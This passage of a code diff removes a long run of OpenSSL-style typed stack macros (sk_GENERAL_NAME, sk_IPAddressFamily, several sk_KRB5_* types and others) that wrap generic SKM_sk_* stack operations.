-#define sk_GENERAL_NAME_set(st, i, val) SKM_sk_set(GENERAL_NAME, (st), (i), (val))
-#define sk_GENERAL_NAME_zero(st) SKM_sk_zero(GENERAL_NAME, (st))
-#define sk_GENERAL_NAME_push(st, val) SKM_sk_push(GENERAL_NAME, (st), (val))
-#define sk_GENERAL_NAME_unshift(st, val) SKM_sk_unshift(GENERAL_NAME, (st), (val))
-#define sk_GENERAL_NAME_find(st, val) SKM_sk_find(GENERAL_NAME, (st), (val))
-#define sk_GENERAL_NAME_find_ex(st, val) SKM_sk_find_ex(GENERAL_NAME, (st), (val))
-#define sk_GENERAL_NAME_delete(st, i) SKM_sk_delete(GENERAL_NAME, (st), (i))
-#define sk_GENERAL_NAME_delete_ptr(st, ptr) SKM_sk_delete_ptr(GENERAL_NAME, (st), (ptr))
-#define sk_GENERAL_NAME_insert(st, val, i) SKM_sk_insert(GENERAL_NAME, (st), (val), (i))
-#define sk_GENERAL_NAME_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(GENERAL_NAME, (st), (cmp))
-#define sk_GENERAL_NAME_dup(st) SKM_sk_dup(GENERAL_NAME, st)
-#define sk_GENERAL_NAME_pop_free(st, free_func) SKM_sk_pop_free(GENERAL_NAME, (st), (free_func))
-#define sk_GENERAL_NAME_shift(st) SKM_sk_shift(GENERAL_NAME, (st))
-#define sk_GENERAL_NAME_pop(st) SKM_sk_pop(GENERAL_NAME, (st))
-#define sk_GENERAL_NAME_sort(st) SKM_sk_sort(GENERAL_NAME, (st))
-#define sk_GENERAL_NAME_is_sorted(st) SKM_sk_is_sorted(GENERAL_NAME, (st))
-
-#define sk_GENERAL_NAMES_new(cmp) SKM_sk_new(GENERAL_NAMES, (cmp))
-#define sk_GENERAL_NAMES_new_null() SKM_sk_new_null(GENERAL_NAMES)
-#define sk_GENERAL_NAMES_free(st) SKM_sk_free(GENERAL_NAMES, (st))
-#define sk_GENERAL_NAMES_num(st) SKM_sk_num(GENERAL_NAMES, (st))
-#define sk_GENERAL_NAMES_value(st, i) SKM_sk_value(GENERAL_NAMES, (st), (i))
-#define sk_GENERAL_NAMES_set(st, i, val) SKM_sk_set(GENERAL_NAMES, (st), (i), (val))
-#define sk_GENERAL_NAMES_zero(st) SKM_sk_zero(GENERAL_NAMES, (st))
-#define sk_GENERAL_NAMES_push(st, val) SKM_sk_push(GENERAL_NAMES, (st), (val))
-#define sk_GENERAL_NAMES_unshift(st, val) SKM_sk_unshift(GENERAL_NAMES, (st), (val))
-#define sk_GENERAL_NAMES_find(st, val) SKM_sk_find(GENERAL_NAMES, (st), (val))
-#define sk_GENERAL_NAMES_find_ex(st, val) SKM_sk_find_ex(GENERAL_NAMES, (st), (val))
-#define sk_GENERAL_NAMES_delete(st, i) SKM_sk_delete(GENERAL_NAMES, (st), (i))
-#define sk_GENERAL_NAMES_delete_ptr(st, ptr) SKM_sk_delete_ptr(GENERAL_NAMES, (st), (ptr))
-#define sk_GENERAL_NAMES_insert(st, val, i) SKM_sk_insert(GENERAL_NAMES, (st), (val), (i))
-#define sk_GENERAL_NAMES_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(GENERAL_NAMES, (st), (cmp))
-#define sk_GENERAL_NAMES_dup(st) SKM_sk_dup(GENERAL_NAMES, st)
-#define sk_GENERAL_NAMES_pop_free(st, free_func) SKM_sk_pop_free(GENERAL_NAMES, (st), (free_func))
-#define sk_GENERAL_NAMES_shift(st) SKM_sk_shift(GENERAL_NAMES, (st))
-#define sk_GENERAL_NAMES_pop(st) SKM_sk_pop(GENERAL_NAMES, (st))
-#define sk_GENERAL_NAMES_sort(st) SKM_sk_sort(GENERAL_NAMES, (st))
-#define sk_GENERAL_NAMES_is_sorted(st) SKM_sk_is_sorted(GENERAL_NAMES, (st))
-
-#define sk_GENERAL_SUBTREE_new(cmp) SKM_sk_new(GENERAL_SUBTREE, (cmp))
-#define sk_GENERAL_SUBTREE_new_null() SKM_sk_new_null(GENERAL_SUBTREE)
-#define sk_GENERAL_SUBTREE_free(st) SKM_sk_free(GENERAL_SUBTREE, (st))
-#define sk_GENERAL_SUBTREE_num(st) SKM_sk_num(GENERAL_SUBTREE, (st))
-#define sk_GENERAL_SUBTREE_value(st, i) SKM_sk_value(GENERAL_SUBTREE, (st), (i))
-#define sk_GENERAL_SUBTREE_set(st, i, val) SKM_sk_set(GENERAL_SUBTREE, (st), (i), (val))
-#define sk_GENERAL_SUBTREE_zero(st) SKM_sk_zero(GENERAL_SUBTREE, (st))
-#define sk_GENERAL_SUBTREE_push(st, val) SKM_sk_push(GENERAL_SUBTREE, (st), (val))
-#define sk_GENERAL_SUBTREE_unshift(st, val) SKM_sk_unshift(GENERAL_SUBTREE, (st), (val))
-#define sk_GENERAL_SUBTREE_find(st, val) SKM_sk_find(GENERAL_SUBTREE, (st), (val))
-#define sk_GENERAL_SUBTREE_find_ex(st, val) SKM_sk_find_ex(GENERAL_SUBTREE, (st), (val))
-#define sk_GENERAL_SUBTREE_delete(st, i) SKM_sk_delete(GENERAL_SUBTREE, (st), (i))
-#define sk_GENERAL_SUBTREE_delete_ptr(st, ptr) SKM_sk_delete_ptr(GENERAL_SUBTREE, (st), (ptr))
-#define sk_GENERAL_SUBTREE_insert(st, val, i) SKM_sk_insert(GENERAL_SUBTREE, (st), (val), (i))
-#define sk_GENERAL_SUBTREE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(GENERAL_SUBTREE, (st), (cmp))
-#define sk_GENERAL_SUBTREE_dup(st) SKM_sk_dup(GENERAL_SUBTREE, st)
-#define sk_GENERAL_SUBTREE_pop_free(st, free_func) SKM_sk_pop_free(GENERAL_SUBTREE, (st), (free_func))
-#define sk_GENERAL_SUBTREE_shift(st) SKM_sk_shift(GENERAL_SUBTREE, (st))
-#define sk_GENERAL_SUBTREE_pop(st) SKM_sk_pop(GENERAL_SUBTREE, (st))
-#define sk_GENERAL_SUBTREE_sort(st) SKM_sk_sort(GENERAL_SUBTREE, (st))
-#define sk_GENERAL_SUBTREE_is_sorted(st) SKM_sk_is_sorted(GENERAL_SUBTREE, (st))
-
-#define sk_IPAddressFamily_new(cmp) SKM_sk_new(IPAddressFamily, (cmp))
-#define sk_IPAddressFamily_new_null() SKM_sk_new_null(IPAddressFamily)
-#define sk_IPAddressFamily_free(st) SKM_sk_free(IPAddressFamily, (st))
-#define sk_IPAddressFamily_num(st) SKM_sk_num(IPAddressFamily, (st))
-#define sk_IPAddressFamily_value(st, i) SKM_sk_value(IPAddressFamily, (st), (i))
-#define sk_IPAddressFamily_set(st, i, val) SKM_sk_set(IPAddressFamily, (st), (i), (val))
-#define sk_IPAddressFamily_zero(st) SKM_sk_zero(IPAddressFamily, (st))
-#define sk_IPAddressFamily_push(st, val) SKM_sk_push(IPAddressFamily, (st), (val))
-#define sk_IPAddressFamily_unshift(st, val) SKM_sk_unshift(IPAddressFamily, (st), (val))
-#define sk_IPAddressFamily_find(st, val) SKM_sk_find(IPAddressFamily, (st), (val))
-#define sk_IPAddressFamily_find_ex(st, val) SKM_sk_find_ex(IPAddressFamily, (st), (val))
-#define sk_IPAddressFamily_delete(st, i) SKM_sk_delete(IPAddressFamily, (st), (i))
-#define sk_IPAddressFamily_delete_ptr(st, ptr) SKM_sk_delete_ptr(IPAddressFamily, (st), (ptr))
-#define sk_IPAddressFamily_insert(st, val, i) SKM_sk_insert(IPAddressFamily, (st), (val), (i))
-#define sk_IPAddressFamily_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(IPAddressFamily, (st), (cmp))
-#define sk_IPAddressFamily_dup(st) SKM_sk_dup(IPAddressFamily, st)
-#define sk_IPAddressFamily_pop_free(st, free_func) SKM_sk_pop_free(IPAddressFamily, (st), (free_func))
-#define sk_IPAddressFamily_shift(st) SKM_sk_shift(IPAddressFamily, (st))
-#define sk_IPAddressFamily_pop(st) SKM_sk_pop(IPAddressFamily, (st))
-#define sk_IPAddressFamily_sort(st) SKM_sk_sort(IPAddressFamily, (st))
-#define sk_IPAddressFamily_is_sorted(st) SKM_sk_is_sorted(IPAddressFamily, (st))
-
-#define sk_IPAddressOrRange_new(cmp) SKM_sk_new(IPAddressOrRange, (cmp))
-#define sk_IPAddressOrRange_new_null() SKM_sk_new_null(IPAddressOrRange)
-#define sk_IPAddressOrRange_free(st) SKM_sk_free(IPAddressOrRange, (st))
-#define sk_IPAddressOrRange_num(st) SKM_sk_num(IPAddressOrRange, (st))
-#define sk_IPAddressOrRange_value(st, i) SKM_sk_value(IPAddressOrRange, (st), (i))
-#define sk_IPAddressOrRange_set(st, i, val) SKM_sk_set(IPAddressOrRange, (st), (i), (val))
-#define sk_IPAddressOrRange_zero(st) SKM_sk_zero(IPAddressOrRange, (st))
-#define sk_IPAddressOrRange_push(st, val) SKM_sk_push(IPAddressOrRange, (st), (val))
-#define sk_IPAddressOrRange_unshift(st, val) SKM_sk_unshift(IPAddressOrRange, (st), (val))
-#define sk_IPAddressOrRange_find(st, val) SKM_sk_find(IPAddressOrRange, (st), (val))
-#define sk_IPAddressOrRange_find_ex(st, val) SKM_sk_find_ex(IPAddressOrRange, (st), (val))
-#define sk_IPAddressOrRange_delete(st, i) SKM_sk_delete(IPAddressOrRange, (st), (i))
-#define sk_IPAddressOrRange_delete_ptr(st, ptr) SKM_sk_delete_ptr(IPAddressOrRange, (st), (ptr))
-#define sk_IPAddressOrRange_insert(st, val, i) SKM_sk_insert(IPAddressOrRange, (st), (val), (i))
-#define sk_IPAddressOrRange_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(IPAddressOrRange, (st), (cmp))
-#define sk_IPAddressOrRange_dup(st) SKM_sk_dup(IPAddressOrRange, st)
-#define sk_IPAddressOrRange_pop_free(st, free_func) SKM_sk_pop_free(IPAddressOrRange, (st), (free_func))
-#define sk_IPAddressOrRange_shift(st) SKM_sk_shift(IPAddressOrRange, (st))
-#define sk_IPAddressOrRange_pop(st) SKM_sk_pop(IPAddressOrRange, (st))
-#define sk_IPAddressOrRange_sort(st) SKM_sk_sort(IPAddressOrRange, (st))
-#define sk_IPAddressOrRange_is_sorted(st) SKM_sk_is_sorted(IPAddressOrRange, (st))
-
-#define sk_KRB5_APREQBODY_new(cmp) SKM_sk_new(KRB5_APREQBODY, (cmp))
-#define sk_KRB5_APREQBODY_new_null() SKM_sk_new_null(KRB5_APREQBODY)
-#define sk_KRB5_APREQBODY_free(st) SKM_sk_free(KRB5_APREQBODY, (st))
-#define sk_KRB5_APREQBODY_num(st) SKM_sk_num(KRB5_APREQBODY, (st))
-#define sk_KRB5_APREQBODY_value(st, i) SKM_sk_value(KRB5_APREQBODY, (st), (i))
-#define sk_KRB5_APREQBODY_set(st, i, val) SKM_sk_set(KRB5_APREQBODY, (st), (i), (val))
-#define sk_KRB5_APREQBODY_zero(st) SKM_sk_zero(KRB5_APREQBODY, (st))
-#define sk_KRB5_APREQBODY_push(st, val) SKM_sk_push(KRB5_APREQBODY, (st), (val))
-#define sk_KRB5_APREQBODY_unshift(st, val) SKM_sk_unshift(KRB5_APREQBODY, (st), (val))
-#define sk_KRB5_APREQBODY_find(st, val) SKM_sk_find(KRB5_APREQBODY, (st), (val))
-#define sk_KRB5_APREQBODY_find_ex(st, val) SKM_sk_find_ex(KRB5_APREQBODY, (st), (val))
-#define sk_KRB5_APREQBODY_delete(st, i) SKM_sk_delete(KRB5_APREQBODY, (st), (i))
-#define sk_KRB5_APREQBODY_delete_ptr(st, ptr) SKM_sk_delete_ptr(KRB5_APREQBODY, (st), (ptr))
-#define sk_KRB5_APREQBODY_insert(st, val, i) SKM_sk_insert(KRB5_APREQBODY, (st), (val), (i))
-#define sk_KRB5_APREQBODY_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(KRB5_APREQBODY, (st), (cmp))
-#define sk_KRB5_APREQBODY_dup(st) SKM_sk_dup(KRB5_APREQBODY, st)
-#define sk_KRB5_APREQBODY_pop_free(st, free_func) SKM_sk_pop_free(KRB5_APREQBODY, (st), (free_func))
-#define sk_KRB5_APREQBODY_shift(st) SKM_sk_shift(KRB5_APREQBODY, (st))
-#define sk_KRB5_APREQBODY_pop(st) SKM_sk_pop(KRB5_APREQBODY, (st))
-#define sk_KRB5_APREQBODY_sort(st) SKM_sk_sort(KRB5_APREQBODY, (st))
-#define sk_KRB5_APREQBODY_is_sorted(st) SKM_sk_is_sorted(KRB5_APREQBODY, (st))
-
-#define sk_KRB5_AUTHDATA_new(cmp) SKM_sk_new(KRB5_AUTHDATA, (cmp))
-#define sk_KRB5_AUTHDATA_new_null() SKM_sk_new_null(KRB5_AUTHDATA)
-#define sk_KRB5_AUTHDATA_free(st) SKM_sk_free(KRB5_AUTHDATA, (st))
-#define sk_KRB5_AUTHDATA_num(st) SKM_sk_num(KRB5_AUTHDATA, (st))
-#define sk_KRB5_AUTHDATA_value(st, i) SKM_sk_value(KRB5_AUTHDATA, (st), (i))
-#define sk_KRB5_AUTHDATA_set(st, i, val) SKM_sk_set(KRB5_AUTHDATA, (st), (i), (val))
-#define sk_KRB5_AUTHDATA_zero(st) SKM_sk_zero(KRB5_AUTHDATA, (st))
-#define sk_KRB5_AUTHDATA_push(st, val) SKM_sk_push(KRB5_AUTHDATA, (st), (val))
-#define sk_KRB5_AUTHDATA_unshift(st, val) SKM_sk_unshift(KRB5_AUTHDATA, (st), (val))
-#define sk_KRB5_AUTHDATA_find(st, val) SKM_sk_find(KRB5_AUTHDATA, (st), (val))
-#define sk_KRB5_AUTHDATA_find_ex(st, val) SKM_sk_find_ex(KRB5_AUTHDATA, (st), (val))
-#define sk_KRB5_AUTHDATA_delete(st, i) SKM_sk_delete(KRB5_AUTHDATA, (st), (i))
-#define sk_KRB5_AUTHDATA_delete_ptr(st, ptr) SKM_sk_delete_ptr(KRB5_AUTHDATA, (st), (ptr))
-#define sk_KRB5_AUTHDATA_insert(st, val, i) SKM_sk_insert(KRB5_AUTHDATA, (st), (val), (i))
-#define sk_KRB5_AUTHDATA_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(KRB5_AUTHDATA, (st), (cmp))
-#define sk_KRB5_AUTHDATA_dup(st) SKM_sk_dup(KRB5_AUTHDATA, st)
-#define sk_KRB5_AUTHDATA_pop_free(st, free_func) SKM_sk_pop_free(KRB5_AUTHDATA, (st), (free_func))
-#define sk_KRB5_AUTHDATA_shift(st) SKM_sk_shift(KRB5_AUTHDATA, (st))
-#define sk_KRB5_AUTHDATA_pop(st) SKM_sk_pop(KRB5_AUTHDATA, (st))
-#define sk_KRB5_AUTHDATA_sort(st) SKM_sk_sort(KRB5_AUTHDATA, (st))
-#define sk_KRB5_AUTHDATA_is_sorted(st) SKM_sk_is_sorted(KRB5_AUTHDATA, (st))
-
-#define sk_KRB5_AUTHENTBODY_new(cmp) SKM_sk_new(KRB5_AUTHENTBODY, (cmp))
-#define sk_KRB5_AUTHENTBODY_new_null() SKM_sk_new_null(KRB5_AUTHENTBODY)
-#define sk_KRB5_AUTHENTBODY_free(st) SKM_sk_free(KRB5_AUTHENTBODY, (st))
-#define sk_KRB5_AUTHENTBODY_num(st) SKM_sk_num(KRB5_AUTHENTBODY, (st))
-#define sk_KRB5_AUTHENTBODY_value(st, i) SKM_sk_value(KRB5_AUTHENTBODY, (st), (i))
-#define sk_KRB5_AUTHENTBODY_set(st, i, val) SKM_sk_set(KRB5_AUTHENTBODY, (st), (i), (val))
-#define sk_KRB5_AUTHENTBODY_zero(st) SKM_sk_zero(KRB5_AUTHENTBODY, (st))
-#define sk_KRB5_AUTHENTBODY_push(st, val) SKM_sk_push(KRB5_AUTHENTBODY, (st), (val))
-#define sk_KRB5_AUTHENTBODY_unshift(st, val) SKM_sk_unshift(KRB5_AUTHENTBODY, (st), (val))
-#define sk_KRB5_AUTHENTBODY_find(st, val) SKM_sk_find(KRB5_AUTHENTBODY, (st), (val))
-#define sk_KRB5_AUTHENTBODY_find_ex(st, val) SKM_sk_find_ex(KRB5_AUTHENTBODY, (st), (val))
-#define sk_KRB5_AUTHENTBODY_delete(st, i) SKM_sk_delete(KRB5_AUTHENTBODY, (st), (i))
-#define sk_KRB5_AUTHENTBODY_delete_ptr(st, ptr) SKM_sk_delete_ptr(KRB5_AUTHENTBODY, (st), (ptr))
-#define sk_KRB5_AUTHENTBODY_insert(st, val, i) SKM_sk_insert(KRB5_AUTHENTBODY, (st), (val), (i))
-#define sk_KRB5_AUTHENTBODY_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(KRB5_AUTHENTBODY, (st), (cmp))
-#define sk_KRB5_AUTHENTBODY_dup(st) SKM_sk_dup(KRB5_AUTHENTBODY, st)
-#define sk_KRB5_AUTHENTBODY_pop_free(st, free_func) SKM_sk_pop_free(KRB5_AUTHENTBODY, (st), (free_func))
-#define sk_KRB5_AUTHENTBODY_shift(st) SKM_sk_shift(KRB5_AUTHENTBODY, (st))
-#define sk_KRB5_AUTHENTBODY_pop(st) SKM_sk_pop(KRB5_AUTHENTBODY, (st))
-#define sk_KRB5_AUTHENTBODY_sort(st) SKM_sk_sort(KRB5_AUTHENTBODY, (st))
-#define sk_KRB5_AUTHENTBODY_is_sorted(st) SKM_sk_is_sorted(KRB5_AUTHENTBODY, (st))
-
-#define sk_KRB5_CHECKSUM_new(cmp) SKM_sk_new(KRB5_CHECKSUM, (cmp))
-#define sk_KRB5_CHECKSUM_new_null() SKM_sk_new_null(KRB5_CHECKSUM)
-#define sk_KRB5_CHECKSUM_free(st) SKM_sk_free(KRB5_CHECKSUM, (st))
-#define sk_KRB5_CHECKSUM_num(st) SKM_sk_num(KRB5_CHECKSUM, (st))
-#define sk_KRB5_CHECKSUM_value(st, i) SKM_sk_value(KRB5_CHECKSUM, (st), (i))
-#define sk_KRB5_CHECKSUM_set(st, i, val) SKM_sk_set(KRB5_CHECKSUM, (st), (i), (val))
-#define sk_KRB5_CHECKSUM_zero(st) SKM_sk_zero(KRB5_CHECKSUM, (st))
-#define sk_KRB5_CHECKSUM_push(st, val) SKM_sk_push(KRB5_CHECKSUM, (st), (val))
-#define sk_KRB5_CHECKSUM_unshift(st, val) SKM_sk_unshift(KRB5_CHECKSUM, (st), (val))
-#define sk_KRB5_CHECKSUM_find(st, val) SKM_sk_find(KRB5_CHECKSUM, (st), (val))
-#define sk_KRB5_CHECKSUM_find_ex(st, val) SKM_sk_find_ex(KRB5_CHECKSUM, (st), (val))
-#define sk_KRB5_CHECKSUM_delete(st, i) SKM_sk_delete(KRB5_CHECKSUM, (st), (i))
-#define sk_KRB5_CHECKSUM_delete_ptr(st, ptr) SKM_sk_delete_ptr(KRB5_CHECKSUM, (st), (ptr))
-#define sk_KRB5_CHECKSUM_insert(st, val, i) SKM_sk_insert(KRB5_CHECKSUM, (st), (val), (i))
-#define sk_KRB5_CHECKSUM_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(KRB5_CHECKSUM, (st), (cmp))
-#define sk_KRB5_CHECKSUM_dup(st) SKM_sk_dup(KRB5_CHECKSUM, st)
-#define sk_KRB5_CHECKSUM_pop_free(st, free_func) SKM_sk_pop_free(KRB5_CHECKSUM, (st), (free_func))
-#define sk_KRB5_CHECKSUM_shift(st) SKM_sk_shift(KRB5_CHECKSUM, (st))
-#define sk_KRB5_CHECKSUM_pop(st) SKM_sk_pop(KRB5_CHECKSUM, (st))
-#define sk_KRB5_CHECKSUM_sort(st) SKM_sk_sort(KRB5_CHECKSUM, (st))
-#define sk_KRB5_CHECKSUM_is_sorted(st) SKM_sk_is_sorted(KRB5_CHECKSUM, (st))
-
-#define sk_KRB5_ENCDATA_new(cmp) SKM_sk_new(KRB5_ENCDATA, (cmp))
-#define sk_KRB5_ENCDATA_new_null() SKM_sk_new_null(KRB5_ENCDATA)
-#define sk_KRB5_ENCDATA_free(st) SKM_sk_free(KRB5_ENCDATA, (st))
-#define sk_KRB5_ENCDATA_num(st) SKM_sk_num(KRB5_ENCDATA, (st))
-#define sk_KRB5_ENCDATA_value(st, i) SKM_sk_value(KRB5_ENCDATA, (st), (i))
-#define sk_KRB5_ENCDATA_set(st, i, val) SKM_sk_set(KRB5_ENCDATA, (st), (i), (val))
-#define sk_KRB5_ENCDATA_zero(st) SKM_sk_zero(KRB5_ENCDATA, (st))
-#define sk_KRB5_ENCDATA_push(st, val) SKM_sk_push(KRB5_ENCDATA, (st), (val))
-#define sk_KRB5_ENCDATA_unshift(st, val) SKM_sk_unshift(KRB5_ENCDATA, (st), (val))
-#define sk_KRB5_ENCDATA_find(st, val) SKM_sk_find(KRB5_ENCDATA, (st), (val))
-#define sk_KRB5_ENCDATA_find_ex(st, val) SKM_sk_find_ex(KRB5_ENCDATA, (st), (val))
-#define sk_KRB5_ENCDATA_delete(st, i) SKM_sk_delete(KRB5_ENCDATA, (st), (i))
-#define sk_KRB5_ENCDATA_delete_ptr(st, ptr) SKM_sk_delete_ptr(KRB5_ENCDATA, (st), (ptr))
-#define sk_KRB5_ENCDATA_insert(st, val, i) SKM_sk_insert(KRB5_ENCDATA, (st), (val), (i))
-#define sk_KRB5_ENCDATA_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(KRB5_ENCDATA, (st), (cmp))
-#define sk_KRB5_ENCDATA_dup(st) SKM_sk_dup(KRB5_ENCDATA, st)
-#define sk_KRB5_ENCDATA_pop_free(st, free_func) SKM_sk_pop_free(KRB5_ENCDATA, (st), (free_func))
-#define sk_KRB5_ENCDATA_shift(st) SKM_sk_shift(KRB5_ENCDATA, (st))
-#define sk_KRB5_ENCDATA_pop(st) SKM_sk_pop(KRB5_ENCDATA, (st))
-#define sk_KRB5_ENCDATA_sort(st) SKM_sk_sort(KRB5_ENCDATA, (st))
-#define sk_KRB5_ENCDATA_is_sorted(st) SKM_sk_is_sorted(KRB5_ENCDATA, (st))
-
-#define sk_KRB5_ENCKEY_new(cmp) SKM_sk_new(KRB5_ENCKEY, (cmp))
-#define sk_KRB5_ENCKEY_new_null() SKM_sk_new_null(KRB5_ENCKEY)
-#define sk_KRB5_ENCKEY_free(st) SKM_sk_free(KRB5_ENCKEY, (st))
-#define sk_KRB5_ENCKEY_num(st) SKM_sk_num(KRB5_ENCKEY, (st))
-#define sk_KRB5_ENCKEY_value(st, i) SKM_sk_value(KRB5_ENCKEY, (st), (i))
-#define sk_KRB5_ENCKEY_set(st, i, val) SKM_sk_set(KRB5_ENCKEY, (st), (i), (val))
-#define sk_KRB5_ENCKEY_zero(st) SKM_sk_zero(KRB5_ENCKEY, (st))
-#define sk_KRB5_ENCKEY_push(st, val) SKM_sk_push(KRB5_ENCKEY, (st), (val))
-#define sk_KRB5_ENCKEY_unshift(st, val) SKM_sk_unshift(KRB5_ENCKEY, (st), (val))
-#define sk_KRB5_ENCKEY_find(st, val) SKM_sk_find(KRB5_ENCKEY, (st), (val))
-#define sk_KRB5_ENCKEY_find_ex(st, val) SKM_sk_find_ex(KRB5_ENCKEY, (st), (val))
-#define sk_KRB5_ENCKEY_delete(st, i) SKM_sk_delete(KRB5_ENCKEY, (st), (i))
-#define sk_KRB5_ENCKEY_delete_ptr(st, ptr) SKM_sk_delete_ptr(KRB5_ENCKEY, (st), (ptr))
-#define sk_KRB5_ENCKEY_insert(st, val, i) SKM_sk_insert(KRB5_ENCKEY, (st), (val), (i))
-#define sk_KRB5_ENCKEY_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(KRB5_ENCKEY, (st), (cmp))
-#define sk_KRB5_ENCKEY_dup(st) SKM_sk_dup(KRB5_ENCKEY, st)
-#define sk_KRB5_ENCKEY_pop_free(st, free_func) SKM_sk_pop_free(KRB5_ENCKEY, (st), (free_func))
-#define sk_KRB5_ENCKEY_shift(st) SKM_sk_shift(KRB5_ENCKEY, (st))
-#define sk_KRB5_ENCKEY_pop(st) SKM_sk_pop(KRB5_ENCKEY, (st))
-#define sk_KRB5_ENCKEY_sort(st) SKM_sk_sort(KRB5_ENCKEY, (st))
-#define sk_KRB5_ENCKEY_is_sorted(st) SKM_sk_is_sorted(KRB5_ENCKEY, (st))
-
-#define sk_KRB5_PRINCNAME_new(cmp) SKM_sk_new(KRB5_PRINCNAME, (cmp))
-#define sk_KRB5_PRINCNAME_new_null() SKM_sk_new_null(KRB5_PRINCNAME)
-#define sk_KRB5_PRINCNAME_free(st) SKM_sk_free(KRB5_PRINCNAME, (st))
-#define sk_KRB5_PRINCNAME_num(st) SKM_sk_num(KRB5_PRINCNAME, (st))
-#define sk_KRB5_PRINCNAME_value(st, i) SKM_sk_value(KRB5_PRINCNAME, (st), (i))
-#define sk_KRB5_PRINCNAME_set(st, i, val) SKM_sk_set(KRB5_PRINCNAME, (st), (i), (val))
-#define sk_KRB5_PRINCNAME_zero(st) SKM_sk_zero(KRB5_PRINCNAME, (st))
-#define sk_KRB5_PRINCNAME_push(st, val) SKM_sk_push(KRB5_PRINCNAME, (st), (val))
-#define sk_KRB5_PRINCNAME_unshift(st, val) SKM_sk_unshift(KRB5_PRINCNAME, (st), (val))
-#define sk_KRB5_PRINCNAME_find(st, val) SKM_sk_find(KRB5_PRINCNAME, (st), (val))
-#define sk_KRB5_PRINCNAME_find_ex(st, val) SKM_sk_find_ex(KRB5_PRINCNAME, (st), (val))
-#define sk_KRB5_PRINCNAME_delete(st, i) SKM_sk_delete(KRB5_PRINCNAME, (st), (i))
-#define sk_KRB5_PRINCNAME_delete_ptr(st, ptr) SKM_sk_delete_ptr(KRB5_PRINCNAME, (st), (ptr))
-#define sk_KRB5_PRINCNAME_insert(st, val, i) SKM_sk_insert(KRB5_PRINCNAME, (st), (val), (i))
-#define sk_KRB5_PRINCNAME_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(KRB5_PRINCNAME, (st), (cmp))
-#define sk_KRB5_PRINCNAME_dup(st) SKM_sk_dup(KRB5_PRINCNAME, st)
-#define sk_KRB5_PRINCNAME_pop_free(st, free_func) SKM_sk_pop_free(KRB5_PRINCNAME, (st), (free_func))
-#define sk_KRB5_PRINCNAME_shift(st) SKM_sk_shift(KRB5_PRINCNAME, (st))
-#define sk_KRB5_PRINCNAME_pop(st) SKM_sk_pop(KRB5_PRINCNAME, (st))
-#define sk_KRB5_PRINCNAME_sort(st) SKM_sk_sort(KRB5_PRINCNAME, (st))
-#define sk_KRB5_PRINCNAME_is_sorted(st) SKM_sk_is_sorted(KRB5_PRINCNAME, (st))
-
-#define sk_KRB5_TKTBODY_new(cmp) SKM_sk_new(KRB5_TKTBODY, (cmp))
-#define sk_KRB5_TKTBODY_new_null() SKM_sk_new_null(KRB5_TKTBODY)
-#define sk_KRB5_TKTBODY_free(st) SKM_sk_free(KRB5_TKTBODY, (st))
-#define sk_KRB5_TKTBODY_num(st) SKM_sk_num(KRB5_TKTBODY, (st))
-#define sk_KRB5_TKTBODY_value(st, i) SKM_sk_value(KRB5_TKTBODY, (st), (i))
-#define sk_KRB5_TKTBODY_set(st, i, val) SKM_sk_set(KRB5_TKTBODY, (st), (i), (val))
-#define sk_KRB5_TKTBODY_zero(st) SKM_sk_zero(KRB5_TKTBODY, (st))
-#define sk_KRB5_TKTBODY_push(st, val) SKM_sk_push(KRB5_TKTBODY, (st), (val))
-#define sk_KRB5_TKTBODY_unshift(st, val) SKM_sk_unshift(KRB5_TKTBODY, (st), (val))
-#define sk_KRB5_TKTBODY_find(st, val) SKM_sk_find(KRB5_TKTBODY, (st), (val))
-#define sk_KRB5_TKTBODY_find_ex(st, val) SKM_sk_find_ex(KRB5_TKTBODY, (st), (val))
-#define sk_KRB5_TKTBODY_delete(st, i) SKM_sk_delete(KRB5_TKTBODY, (st), (i))
-#define sk_KRB5_TKTBODY_delete_ptr(st, ptr) SKM_sk_delete_ptr(KRB5_TKTBODY, (st), (ptr))
-#define sk_KRB5_TKTBODY_insert(st, val, i) SKM_sk_insert(KRB5_TKTBODY, (st), (val), (i))
-#define sk_KRB5_TKTBODY_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(KRB5_TKTBODY, (st), (cmp))
-#define sk_KRB5_TKTBODY_dup(st) SKM_sk_dup(KRB5_TKTBODY, st)
-#define sk_KRB5_TKTBODY_pop_free(st, free_func) SKM_sk_pop_free(KRB5_TKTBODY, (st), (free_func))
-#define sk_KRB5_TKTBODY_shift(st) SKM_sk_shift(KRB5_TKTBODY, (st))
-#define sk_KRB5_TKTBODY_pop(st) SKM_sk_pop(KRB5_TKTBODY, (st))
-#define sk_KRB5_TKTBODY_sort(st) SKM_sk_sort(KRB5_TKTBODY, (st))
-#define sk_KRB5_TKTBODY_is_sorted(st) SKM_sk_is_sorted(KRB5_TKTBODY, (st))
-
-#define sk_MEM_OBJECT_DATA_new(cmp) SKM_sk_new(MEM_OBJECT_DATA, (cmp))
-#define sk_MEM_OBJECT_DATA_new_null() SKM_sk_new_null(MEM_OBJECT_DATA)
-#define sk_MEM_OBJECT_DATA_free(st) SKM_sk_free(MEM_OBJECT_DATA, (st))
-#define sk_MEM_OBJECT_DATA_num(st) SKM_sk_num(MEM_OBJECT_DATA, (st))
-#define sk_MEM_OBJECT_DATA_value(st, i) SKM_sk_value(MEM_OBJECT_DATA, (st), (i))
-#define sk_MEM_OBJECT_DATA_set(st, i, val) SKM_sk_set(MEM_OBJECT_DATA, (st), (i), (val))
-#define sk_MEM_OBJECT_DATA_zero(st) SKM_sk_zero(MEM_OBJECT_DATA, (st))
-#define sk_MEM_OBJECT_DATA_push(st, val) SKM_sk_push(MEM_OBJECT_DATA, (st), (val))
-#define sk_MEM_OBJECT_DATA_unshift(st, val) SKM_sk_unshift(MEM_OBJECT_DATA, (st), (val))
-#define sk_MEM_OBJECT_DATA_find(st, val) SKM_sk_find(MEM_OBJECT_DATA, (st), (val))
